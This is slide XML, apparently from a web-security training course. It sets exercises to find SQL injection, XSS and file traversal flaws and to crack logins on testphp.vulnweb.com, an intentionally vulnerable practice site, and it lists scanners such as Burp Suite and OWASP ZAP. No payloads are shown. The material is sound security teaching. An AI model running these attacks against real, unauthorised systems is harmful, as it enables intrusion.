              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: hack it using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24821016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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Quick Assignment#8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Find XSS/CSS vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3900" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://testphp.vulnweb.com/login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3900" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hint: use Hack bar</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="301130571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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Quick Assignment#9</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Find File traversal attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3900" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://testphp.vulnweb.com/login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3900" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hint: use Hack bar</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="103002327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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Quick Assignment#10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="3892168"/>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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The username known is test. Can you login as admin? If yes, crack it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3900" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://testphp.vulnweb.com/login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3900" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hint: use Hack bar</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="297252073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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Quick Assignment#11</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="3892168"/>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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The username known is admin. Can you login as test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>? If yes, crack it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3900" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://testphp.vulnweb.com/login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3900" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hint: use Hack bar</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="84431719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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vulnerability Scanner applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vooki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security Headers tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Burp Suite Professional or Enterprise edition</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP ZAP tool [Zed Attack Proxy]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Other tools </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13330662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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
